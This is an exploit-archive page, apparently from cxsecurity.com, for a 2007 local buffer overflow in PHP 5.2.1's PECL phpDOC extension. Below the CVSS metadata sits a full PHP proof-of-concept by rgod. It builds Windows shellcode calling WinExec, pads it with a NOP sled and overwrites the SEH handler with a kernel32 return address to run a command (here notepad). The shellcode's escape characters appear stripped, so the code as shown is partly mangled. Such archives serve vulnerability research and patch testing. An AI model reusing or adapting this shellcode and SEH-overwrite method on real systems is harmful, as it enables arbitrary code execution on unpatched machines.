PHP 5.2.1 with PECL phpDOC local buffer overflow

2007.04.04
Credit: rgod
Risk: High
Local: Yes
Remote: No
CWE: CWE-119


CVSS Base Score: 4.3/10
Impact Subscore: 6.4/10
Exploitability Subscore: 3.1/10
Exploit range: Local
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

<?php //PHP 5.2.1 with PECL phpDOC confirm_phpdoc_compiled() local buffer overflow poc exploit //WIN 2K SP3 version / seh overwrite method //to be launched from the cli // by rgod // site: http://retrogod.altervista.org if (!extension_loaded("phpDOC")){ die("you need the phpDOC extension loaded."); } $____scode= "xebx1b". "x5b". "x31xc0". "x50". "x31xc0". "x88x43x59". "x53". "xbbxcax73xe9x77". //WinExec "xffxd3". "x31xc0". "x50". "xbbx5cxcfxe9x77". //ExitProcess "xffxd3". "xe8xe0xffxffxff". "x63x6dx64". "x2e". "x65". "x78x65". "x20x2f". "x63x20". "start notepad & "; //eip & ecx set to the same value ... $eip="x47x30xE9x77";//0x77E93047 pop ECX - pop - retbis kernel32.dll //and futher (junk...) inc edi, xor cl ch, *ja short* //should work on sp4 if you find an usable address $____suntzu=str_repeat("x90",1393 - strlen($____scode)).$____scode.str_repeat("x90",30).$eip.str_repeat("x 90",12); confirm_phpdoc_compiled($____suntzu); ?> original url: http://retrogod.altervista.org/php521_phpdoc_bof.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top